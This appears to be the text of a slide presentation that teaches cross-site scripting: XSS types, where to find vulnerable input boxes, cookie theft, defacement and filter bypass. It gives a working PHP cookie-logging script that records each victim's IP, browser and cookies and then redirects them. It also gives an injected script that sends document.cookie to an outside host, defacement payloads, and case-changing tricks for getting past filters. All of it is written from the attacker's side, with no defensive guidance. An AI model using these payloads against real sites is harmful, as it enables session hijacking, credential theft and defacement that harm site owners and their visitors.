1.Introduction to Cross Site Scripting (XSS) 2.Why XSS ? 3.

Types of Cross Site Scripting => Persistent Cross Site Scripting. => Non-Persistent Cross Site Scripting. 4.Where to Find XSS Vulnerabilities ? 5.Cookie Stealing with XSS 6.Defacing with XSS 7.Bypassing XSS Filters

# It is Cross Site Scripting dont get confused with Cascading Style Sheets. # It is the very common attack found in web-applications and allows the attacker to insert malicious code. # It is the Client side attack which lets the attacker to cause damage to your website. # It allows the attackers to bypass the client side security mechanism.

# The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. # XSS is the process of injecting JavaScript (mainly) and also HTML (HTML Injection) into a website to get desired output by attacker. # The Most Common Output a attacker need is cookies.

Cookies:
A cookie is just one or more pieces of information stored as text strings on your machine. A Web Server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies also helps to store your login credentials. Without cookies you cant say logged in on sites. PHPSESSID is the basic cookie which is just your session on a PHP page.

 Non-Persistent:
Most Common type of XSS

Persistent:
Dangerous and Permanent type of XSS

 Non-Persistent: It means that the injected code is not permanent and is for small time till the user is on page or having the url with malicious code. The best way to implement non-persistent xss is on basic coded search box or search engine. HTML and Javascript codes are executed.

#Example site with a search engine. Post Method:

http://www.sitename.com/search.php (Insert Code in search box) Code: <script>alert(/hacked/)</script>

Get Method:
http://www.sitename.com/search.php?search=<script >alert(/hacked/)</script>

 Persistent: It means that the injected code is permanent and will stay on the site and output can be seen by any user of site. These kind of attack can be implemented on Blogs, Shoutboxes, Profiles, Forums, comment box, testimonial page, just most places where you insert data and it stays there.

 Persistent: The user/attacker could easily insert malicious code in site to pop up message, defacing, cookie grabbing etc. Example Code for pop-up message: <script>alert(/Hacked/)</script>
->When attacker insert this code in some input box and the output will be /Hacked/ when ever some visits the page

# Best way to check xss is manually by finding sites and inserting the short code to get output. 1. <script>alert(hack)</script> 2. <h1>hacked</h1> # You can go for : Search Box Blogs ShoutBox Comment Box Login Box Feedback Forms

In cookies stealing process we can get the details of the victim like: # IP Address # Browser # Date and Time # Refferer Link

Example of php script which accepts cookies.

<?php header("Location: http://www.google.com"); $cookie = $_GET['cookie']; $file = fopen("logs.txt", "a"); $datum = date('d-m-Y / H:i:s'); $ip = $_SERVER['REMOTE_ADDR']; $httprefi= $_SERVER['HTTP_REFERER']; $httpagent= $_SERVER['HTTP_USER_AGENT']; fwrite($file, "\r\nUser Details :- \r\n-> IP Address: $ip\r\n-> Date: $datum (Date=+5.30 GTM)\r\n-> Browser: $httpagent\r\n-> Refferal: $httprefi\r\n Cookies: $cookie \r\n--==[Thnx For Using It :) ]==--\n" ); fclose($file); exit; ?>

Working: # Lets asssume that we got a site vulnerable to persistent xss and the site also have login facility. # We will input the code in the box where we got vulnerability.
Code: <script> document.location = 'http://yoursite.com/steal.php?cookie' + document.cookie; </script>

Working: Now whenever someone view s that page where we added our malicious code for cookie grabbing will grab the cookie of the user in logs.txt file or as u named the file and it will redirect the user to the site you mentioned in php file as i have mentioned www.google.com Note: If the code doesn t work it means we have to bypass the filter.

# To Deface the site using XSS you just need a persistent vulnerability. # This can be done by inserting HTML Injection Code to the site. # You can even add images, flash videos and pre-made html pages by iframe code.

Example Codes:
#Defacing By Image: <IMG SRC="http://site.com/hacked.png"> # Defacing By html Page: <iframe src=http://site/page.html></iframe> #Defacing By inserting Flash File: <EMBED SRC=http://site/hacked.swf> # Redirecting to your site: <script>window.open( "http://www.site.com/" )</script>

# Bypass Filters helps to stop xss attacks on website. # These filters help admin by not executing some words & characters which are used in XSS attack. # To bypass these filters you can change the characters of the script.

Example Codes:
Original: <script>alert(/hacked/')</script> Changed Code: <sCrIpT>aLeRt(/hacked/')</ScRiPt> Original: <marquee><h1>XSS</h1></marquee> Changed Code: '">><marquee><h1>XSS</h1></marquee>

Devinder Goyal
Cyber Security and Anti Hacking Organisation (Member Secretary)

E-mail: devindergoyal@gmail.com Phone: +91-9872559666